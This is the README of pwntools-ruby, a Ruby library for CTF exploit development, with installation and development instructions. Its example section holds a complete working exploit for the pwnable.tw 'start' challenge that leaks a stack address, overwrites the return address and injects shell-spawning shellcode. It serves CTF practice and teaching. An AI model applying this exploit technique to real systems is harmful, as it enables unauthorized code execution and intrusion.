peter50216 / pwntools-ruby

pwntools on Ruby!
MIT License
149 stars 12 forks source link

GitHub stars GitHub issues Build Status Test Coverage Code Climate Inline docs MIT License Dependabot Status Rawsec's CyberSecurity Inventory

pwntools-ruby

Always sad when playing CTF that there's nothing equivalent to pwntools in Python. While pwntools is awesome, I always love Ruby far more than Python... So this is an attempt to create such library.

Would try to have consistent naming with original pwntools, and do things in Ruby style.

Example Usage

Here's an exploitation for start which is a challenge on pwnable.tw.

# encoding: ASCII-8BIT
# The encoding line is important most time, or you'll get "\u0000" when using "\x00" in code,
# which is NOT what we want when doing pwn...

require 'pwn'

context.arch = 'i386'
context.log_level = :debug
z = Sock.new 'chall.pwnable.tw', 10000

z.recvuntil "Let's start the CTF:"
z.send p32(0x8048087).rjust(0x18, 'A')
stk = u32(z.recvuntil "\xff")
log.info "stack address: #{stk.hex}" # Log stack address

# Return to shellcode
addr = stk + 0x14
payload = addr.p32.rjust(0x18, 'A') + asm(shellcraft.sh)
z.write payload

# Switch to interactive mode
z.interact

More features and details can be found in the documentation.

Installation

Install the latest release:

gem install pwntools

Install from master branch:

git clone https://github.com/peter50216/pwntools-ruby
cd pwntools-ruby
bundle install && bundle exec rake install

optional

Some of the features (assembling/disassembling) require non-Ruby dependencies. Checkout the installation guide for keystone-engine and capstone-engine.

Or you are able to get running quickly with

# Install Capstone
sudo apt-get install libcapstone3

# Compile and install Keystone from source
sudo apt-get install cmake
git clone https://github.com/keystone-engine/keystone.git /tmp/keystone
cd /tmp/keystone
mkdir build
cd build
../make-share.sh
sudo make install

Supported Features

Architectures

Modules

Development

git clone https://github.com/peter50216/pwntools-ruby
cd pwntools-ruby
bundle
bundle exec rake

Note to irb users

irb defines main.context.

For the ease of exploit development in irb, that method would be removed if you use require 'pwn'.

You can still get the IRB::Context by irb_context.